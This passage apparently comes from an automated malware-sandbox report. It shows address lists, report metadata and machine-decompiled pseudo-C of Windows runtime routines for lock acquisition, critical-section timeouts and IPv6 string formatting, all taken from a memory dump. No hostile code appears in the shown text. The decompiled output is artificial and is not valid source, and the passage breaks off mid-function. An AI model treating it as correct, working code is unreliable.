                                                                                                                                                      0x0097ea21
                                                                                                                                                      0x0097ea22
                                                                                                                                                      0x0097ea27
                                                                                                                                                      0x0097ea2a
                                                                                                                                                      0x0097ea2a
                                                                                                                                                      0x00951515
                                                                                                                                                      0x00951517
                                                                                                                                                      0x0095156d
                                                                                                                                                      0x00951572
                                                                                                                                                      0x00951575
                                                                                                                                                      0x00951575
                                                                                                                                                      0x0095151e
                                                                                                                                                      0x0097ea50
                                                                                                                                                      0x0097ea55
                                                                                                                                                      0x0097ea58
                                                                                                                                                      0x0097ea58
                                                                                                                                                      0x0095152e
                                                                                                                                                      0x00951531
                                                                                                                                                      0x00951533
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00951535
                                                                                                                                                      0x00951541
                                                                                                                                                      0x00951549
                                                                                                                                                      0x00951549
                                                                                                                                                      0x00951533
                                                                                                                                                      0x009514f3
                                                                                                                                                      0x00951559

                                                                                                                                                      APIs
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 0097EA22
                                                                                                                                                        • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
                                                                                                                                                        • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490
                                                                                                                                                      • ___swprintf_l.LIBCMT ref: 0095156D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                                                      • Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                                                                                                                      • Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
                                                                                                                                                      • Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                                                                                                                      • Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 45%
                                                                                                                                                      			E009353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0090F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00954FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00963F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0099217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00963F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00953915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00935384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0090F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00953915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00953915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00953915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00935329(_t74, _t92);
													_push(1);
													_t48 = E009353A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                                                                                                      0x009353ab
                                                                                                                                                      0x009353ae
                                                                                                                                                      0x009353b1
                                                                                                                                                      0x009353b4
                                                                                                                                                      0x009353b7
                                                                                                                                                      0x009505b6
                                                                                                                                                      0x009505c0
                                                                                                                                                      0x009505c3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009505c9
                                                                                                                                                      0x009505c9
                                                                                                                                                      0x009505cc
                                                                                                                                                      0x009505d5
                                                                                                                                                      0x009505d5
                                                                                                                                                      0x009353bd
                                                                                                                                                      0x009353bd
                                                                                                                                                      0x009353bd
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353be
                                                                                                                                                      0x009353c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972269
                                                                                                                                                      0x0097226d
                                                                                                                                                      0x00972349
                                                                                                                                                      0x0097234d
                                                                                                                                                      0x00972273
                                                                                                                                                      0x00972276
                                                                                                                                                      0x00972279
                                                                                                                                                      0x0097227e
                                                                                                                                                      0x00972283
                                                                                                                                                      0x00972287
                                                                                                                                                      0x0097228a
                                                                                                                                                      0x0097228d
                                                                                                                                                      0x0097228f
                                                                                                                                                      0x009722bc
                                                                                                                                                      0x009722bc
                                                                                                                                                      0x009722bc
                                                                                                                                                      0x009722be
                                                                                                                                                      0x009722c4
                                                                                                                                                      0x009722cc
                                                                                                                                                      0x009722d0
                                                                                                                                                      0x009722d6
                                                                                                                                                      0x009722d7
                                                                                                                                                      0x009722da
                                                                                                                                                      0x009722df
                                                                                                                                                      0x009722e4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722e6
                                                                                                                                                      0x009722e9
                                                                                                                                                      0x009722f4
                                                                                                                                                      0x009722f9
                                                                                                                                                      0x009722fa
                                                                                                                                                      0x00972305
                                                                                                                                                      0x00972314
                                                                                                                                                      0x00972319
                                                                                                                                                      0x0097231a
                                                                                                                                                      0x0097231d
                                                                                                                                                      0x00972320
                                                                                                                                                      0x00972323
                                                                                                                                                      0x00972323
                                                                                                                                                      0x00972328
                                                                                                                                                      0x0097232d
                                                                                                                                                      0x0097232f
                                                                                                                                                      0x00972331
                                                                                                                                                      0x00972336
                                                                                                                                                      0x00972336
                                                                                                                                                      0x0097233b
                                                                                                                                                      0x0097233d
                                                                                                                                                      0x00972350
                                                                                                                                                      0x00972351
                                                                                                                                                      0x00972356
                                                                                                                                                      0x00972359
                                                                                                                                                      0x00972359
                                                                                                                                                      0x0097235b
                                                                                                                                                      0x0097235d
                                                                                                                                                      0x00935367
                                                                                                                                                      0x0093536b
                                                                                                                                                      0x00935372
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972363
                                                                                                                                                      0x00972363
                                                                                                                                                      0x00972369
                                                                                                                                                      0x0097236a
                                                                                                                                                      0x0097236c
                                                                                                                                                      0x00972371
                                                                                                                                                      0x00972373
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00972379
                                                                                                                                                      0x00972379
                                                                                                                                                      0x0097237a
                                                                                                                                                      0x0097237f
                                                                                                                                                      0x0097237f
                                                                                                                                                      0x00972385
                                                                                                                                                      0x00972386
                                                                                                                                                      0x00972389
                                                                                                                                                      0x0097238e
                                                                                                                                                      0x00972390
                                                                                                                                                      0x00935378
                                                                                                                                                      0x0093537c
                                                                                                                                                      0x00972396
                                                                                                                                                      0x00972396
                                                                                                                                                      0x00972397
                                                                                                                                                      0x0097239c
                                                                                                                                                      0x009723a2
                                                                                                                                                      0x009723a3
                                                                                                                                                      0x009723a6
                                                                                                                                                      0x009723ab
                                                                                                                                                      0x009723ad
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009723b3
                                                                                                                                                      0x009723b3
                                                                                                                                                      0x009723b4
                                                                                                                                                      0x009723b9
                                                                                                                                                      0x009723ba
                                                                                                                                                      0x009723ba
                                                                                                                                                      0x009723bc
                                                                                                                                                      0x009723bf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969153
                                                                                                                                                      0x00969158
                                                                                                                                                      0x0096915a
                                                                                                                                                      0x0096915e
                                                                                                                                                      0x00969160
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969166
                                                                                                                                                      0x00969166
                                                                                                                                                      0x00969171
                                                                                                                                                      0x00969176
                                                                                                                                                      0x00969176
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00969160
                                                                                                                                                      0x009723c6
                                                                                                                                                      0x009723cb
                                                                                                                                                      0x009723ce
                                                                                                                                                      0x009723d7
                                                                                                                                                      0x009723d7
                                                                                                                                                      0x009723ad
                                                                                                                                                      0x00972390
                                                                                                                                                      0x00972373
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097233f
                                                                                                                                                      0x00972291
                                                                                                                                                      0x00972291
                                                                                                                                                      0x00972293
                                                                                                                                                      0x00972295
                                                                                                                                                      0x0097229a
                                                                                                                                                      0x009722a1
                                                                                                                                                      0x009722a3
                                                                                                                                                      0x009722a7
                                                                                                                                                      0x009722a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722ab
                                                                                                                                                      0x009722ad
                                                                                                                                                      0x009722af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722af
                                                                                                                                                      0x009722b1
                                                                                                                                                      0x009722b4
                                                                                                                                                      0x009722b4
                                                                                                                                                      0x009722b6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009722b6
                                                                                                                                                      0x0097228f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0097226d
                                                                                                                                                      0x009353cb
                                                                                                                                                      0x009353ce
                                                                                                                                                      0x009353d0
                                                                                                                                                      0x009353d4
                                                                                                                                                      0x009353d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009353d8
                                                                                                                                                      0x009353e3
                                                                                                                                                      0x009353ea
                                                                                                                                                      0x009353ea
                                                                                                                                                      0x009353d6
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 00972328
                                                                                                                                                      • RTL: Resource at %p, xrefs: 0097230B
                                                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                      • API String ID: 885266447-871070163
                                                                                                                                                      • Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                                                                                                                      • Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
                                                                                                                                                      • Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                                                                                                                      • Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0093EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                      			E0093EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0092DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x9f793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E009116C0(_t39);
				} else {
					_t40 = E0090F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00953915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E009101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x9f793c; // 0x0
								_push(_t85);
								_t44 = E00911F28(_t71);
							} else {
								_t44 = E0090F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00953915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00992306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0093EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00954FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00963F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00963F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x9f20c0;
								if(_t85 != 0x9f20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0099217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00963F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                                                                                                                      0x0093ec56
                                                                                                                                                      0x0093ec56
                                                                                                                                                      0x0093ec56
                                                                                                                                                      0x0093ec5c
                                                                                                                                                      0x0093ec64
                                                                                                                                                      0x009723e6
                                                                                                                                                      0x009723eb
                                                                                                                                                      0x009723eb
                                                                                                                                                      0x0093ec6a
                                                                                                                                                      0x0093ec6c
                                                                                                                                                      0x0093ec6f
                                                                                                                                                      0x009723f3
                                                                                                                                                      0x009723f8
                                                                                                                                                      0x009723fa
                                                                                                                                                      0x009723fc
                                                                                                                                                      0x0093ec75
                                                                                                                                                      0x0093ec76
                                                                                                                                                      0x0093ec76
                                                                                                                                                      0x0093ec7b
                                                                                                                                                      0x0093ec7c
                                                                                                                                                      0x0093ec7e
                                                                                                                                                      0x00972406
                                                                                                                                                      0x00972407
                                                                                                                                                      0x0097240c
                                                                                                                                                      0x0097240d
                                                                                                                                                      0x0097240d
                                                                                                                                                      0x0097240d
                                                                                                                                                      0x00972414
                                                                                                                                                      0x00972417
                                                                                                                                                      0x0097241e
                                                                                                                                                      0x00972435
                                                                                                                                                      0x00972438
                                                                                                                                                      0x0097243c
                                                                                                                                                      0x0097243f
                                                                                                                                                      0x00972442
                                                                                                                                                      0x00972443
                                                                                                                                                      0x00972446
                                                                                                                                                      0x00972449
                                                                                                                                                      0x00972453
                                                                                                                                                      0x00972455
                                                                                                                                                      0x0097245b
                                                                                                                                                      0x0097245b
                                                                                                                                                      0x0093eb99
                                                                                                                                                      0x0093eb99
                                                                                                                                                      0x0093eb9c
                                                                                                                                                      0x0093eb9d
                                                                                                                                                      0x0093eb9f
                                                                                                                                                      0x0093eba2
                                                                                                                                                      0x00972465
                                                                                                                                                      0x0097246b
                                                                                                                                                      0x0097246d
                                                                                                                                                      0x0093eba8
                                                                                                                                                      0x0093eba9
                                                                                                                                                      0x0093eba9
                                                                                                                                                      0x0093ebae
                                                                                                                                                      0x0093ebb3
                                                                                                                                                      0x0093ebb9
                                                                                                                                                      0x0093ebbb
                                                                                                                                                      0x00972513
                                                                                                                                                      0x00972514
                                                                                                                                                      0x00972519
                                                                                                                                                      0x0097251b
                                                                                                                                                      0x0093ec2a
                                                                                                                                                      0x0093ec2d
                                                                                                                                                      0x0093ec33
                                                                                                                                                      0x0093ec36
                                                                                                                                                      0x0093ec3a
                                                                                                                                                      0x0093ec3e
                                                                                                                                                      0x0093ec40
                                                                                                                                                      0x0093ec47
                                                                                                                                                      0x0093ec47
                                                                                                                                                      0x0093ec40
                                                                                                                                                      0x009122c6
                                                                                                                                                      0x0093ebc1
                                                                                                                                                      0x0093ebc1
                                                                                                                                                      0x0093ebc5
                                                                                                                                                      0x0093ec9a
                                                                                                                                                      0x0093ec9a
                                                                                                                                                      0x0093ebd6
                                                                                                                                                      0x0093ebd6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0093ebbb
                                                                                                                                                      0x00972477
                                                                                                                                                      0x0097247c
                                                                                                                                                      0x00972486
                                                                                                                                                      0x0097248b
                                                                                                                                                      0x00972496
                                                                                                                                                      0x0097249b
                                                                                                                                                      0x0097249d
                                                                                                                                                      0x009724a0
                                                                                                                                                      0x009724a3
                                                                                                                                                      0x009724aa
                                                                                                                                                      0x009724aa
                                                                                                                                                      0x009724a5
                                                                                                                                                      0x009724a5
                                                                                                                                                      0x009724a5
                                                                                                                                                      0x009724ac
                                                                                                                                                      0x009724af
                                                                                                                                                      0x009724b0
                                                                                                                                                      0x009724b3
                                                                                                                                                      0x009724b9
                                                                                                                                                      0x009724ba
                                                                                                                                                      0x009724bb
                                                                                                                                                      0x009724c6
                                                                                                                                                      0x009724cb
                                                                                                                                                      0x009724cd
                                                                                                                                                      0x009724d0
                                                                                                                                                      0x009724d1
                                                                                                                                                      0x009724d4
                                                                                                                                                      0x009724d6
                                                                                                                                                      0x009724d9
                                                                                                                                                      0x009724d9
                                                                                                                                                      0x009724dc
                                                                                                                                                      0x009724df
                                                                                                                                                      0x009724e1
                                                                                                                                                      0x009724e7
                                                                                                                                                      0x009724e9
                                                                                                                                                      0x009724ec
                                                                                                                                                      0x009724ef
                                                                                                                                                      0x009724f2
                                                                                                                                                      0x009724f2
                                                                                                                                                      0x009724ef
                                                                                                                                                      0x009724e7
                                                                                                                                                      0x009724fa
                                                                                                                                                      0x009724ff
                                                                                                                                                      0x00972501
                                                                                                                                                      0x00972503
                                                                                                                                                      0x00972506
                                                                                                                                                      0x0097250b
                                                                                                                                                      0x0093eb8c
                                                                                                                                                      0x0093eb93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0093eb93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0093eb99
                                                                                                                                                      0x0093ec85
                                                                                                                                                      0x0093ec85
                                                                                                                                                      0x0093ec85
                                                                                                                                                      0x00000000

                                                                                                                                                      Strings
                                                                                                                                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009724BD
                                                                                                                                                      • RTL: Re-Waiting, xrefs: 009724FA
                                                                                                                                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0097248D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                      • API String ID: 0-3177188983
                                                                                                                                                      • Opcode ID: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                                                                                                                      • Instruction ID: de123f56b8b9317c40485bac626a5db3d158d5a5df3137b3a6874b3cedfed3e7
                                                                                                                                                      • Opcode Fuzzy Hash: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                                                                                                                      • Instruction Fuzzy Hash: 9341E771604204ABDB20DB68CC85FAA77BDEF84720F20CA05F5599B2D1D775E9418B60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0094FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0094FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
